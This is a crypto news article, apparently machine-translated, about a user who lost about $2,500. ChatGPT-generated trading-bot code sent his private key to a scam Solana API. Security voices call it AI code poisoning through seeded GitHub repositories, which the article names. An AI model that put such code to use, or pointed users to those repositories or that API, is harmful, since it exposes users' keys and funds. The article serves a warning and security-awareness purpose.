A netizen shared yesterday that he tried to use ChatGPT to develop a currency speculation robot, but his private key was leaked because ChatGPT referenced a malicious API. Scam Sniffer pointed out that this was an AI poisoning incident; chain security expert Cosine also reminded users to review the code generated by AI. (Previous summary: Apple is rumored to release an upgraded version of "LLM Siri" in 2025: an AI life assistant more powerful than ChatGPT) (Background supplement: CZ urgent appeal: Macs equipped with Intel chips have major vulnerabilities, update as soon as possible to protect the security of your assets) Generative artificial intelligence (AI) has brought us convenience, but we must pay attention to whether we can fully trust the content generated by AI! Yesterday (22nd), a netizen r_ocky.eth shared that he tried to use ChatGPT to develop a robot to help speculate on pump.fun meme coins. However, he never expected that ChatGPT wrote a scam in the robot's program code. API website. As a result, he lost $2,500 in funds. This incident triggered widespread discussion, and Yu Xian, the founder of SlowMist, an information security agency, also expressed his views on this. Be careful with information from @OpenAI ! Today I was trying to write a bump bot for https://t.co/cIAVsMwwFk and asked @ChatGPTapp to help me with the code. I got what I asked but I didn't expect that chatGPT would recommend me a scam @solana API website. I lost around $2.5k pic.twitter.com/HGfGrwo3ir — r_ocky.eth (@r_cky0) November 21, 2024 ChatGPT transmits private key to scam website Share by r_ocky.eth, below The graph code is part of the code generated by ChatGPT for him, and will send his private key in the API, which was recommended to him by ChatGPT. However, the API URL solanaapis.com referenced by ChatGPT is a scam website. After searching for this URL, the following screen appears. r_ocky.eth stated that the scammers acted quickly after I used the API and in just 30 minutes transferred all my assets to this wallet address: FdiBGKS8noGHY2fppnDgcgCQts95Ww8HSLUvWbzv1NhX. He said: I actually vaguely felt that there might be something wrong with my operation, but my trust in @OpenAI made me lose my vigilance. In addition, he admitted that he made the mistake of using the main wallet private key, but said: "It's easy to make mistakes when you are rushing to do a lot of things at the same time." Subsequently, @r_cky0 also published the full text of the conversation with ChatGPT at that time, providing it for everyone to do security research to avoid similar incidents from happening again. Cosine: He was really hacked by AI. Regarding the tragic experience of this netizen, chain security expert Cosine also expressed his opinion. He said: "This netizen was really hacked by AI." Unexpectedly, the program code given by GPT was If there is a backdoor, the wallet private key will be sent to the phishing website. At the same time, Cosine also reminds you to pay attention when using LLMs such as GPT/Claude. LLMs are generally fraudulent. After taking a look, this friend's wallet was really "hacked" by AI... I used the code given by GPT to write the bot. I didn't expect that the code given by GPT had a backdoor and would send the private key to the phishing website... Play When using LLMs such as GPT/Claude, you must be aware that there is widespread deception in these LLMs. AI poisoning attacks have been mentioned before, but now this is a real attack case against the Crypto industry. https://t.co/N9o8dPE18C — Cos(Cosine) (@evilcos) November 22, 2024 ChatGPT was deliberately poisoned. In addition, the on-chain anti-fraud platform Scam Sniffer pointed out that this was an AI code poisoning attack. The scammers are contaminating AI training data, planting malicious encryption code, and trying to steal private keys. It shares the discovered malicious code repository (Repository): solanaapisdev/moonshot-trading-bot solanaapisdev/pumpfun-api Scam Sniffer said that GitHub user solanaapisdev has created multiple code repositories in the past 4 months in an attempt to control AI generation Malicious code, please be careful! It recommends: Don’t blindly use AI-generated code. Be sure to review the content of your code carefully. Store private keys in an offline environment. Only obtain code from reliable sources. Cosine personally tested Claude's security awareness. Cosine then shared the private key stealing code (the backdoor code given to GPT after being poisoned) shared by r_ocky.eth with "What are the risks of these codes (risks of these codes)" What is it?" I asked GPT and Claude, and the results showed: GPT-4o: It did prompt that the private key is at risk, but it said a lot of nonsense and did not hit the point at all. The results of Claude-3.5-Sonnet directly hit the point: this code will send the private key out and cause leakage... This made Cosine couldn't help but say: Which LLM is more powerful, needless to say.He said: The codes I generate using LLM are usually cross-reviewed by LLMs if they are more complex, and I must be the last reviewer... It is quite common for people who are not familiar with code to be deceived by AI. Cosine further added, but in fact, humans are more terrifying. On the Internet and in program code warehouses, it is difficult to tell what is true and what is false. It is not surprising that AI learns based on these things and is contaminated and poisoned. In the next step, AI will be smarter and know how to conduct safety reviews on each of its outputs, which will also make humans feel more at ease. But you still have to be careful. Supply chain poisoning is really hard to predict and will always pop up suddenly. Related reports Binance refutes rumors! Deny that 12.8 million customers’ personal information was leaked to the dark web, beware of phishing scams. A love letter to decentralized believers: the intersection of cryptography, moral responsibility and the cryptopunk movement) YouTube cryptocurrency tutorial "Writing smart contracts with ChatGPT", scam Victim 10ETH "Be careful! Internet...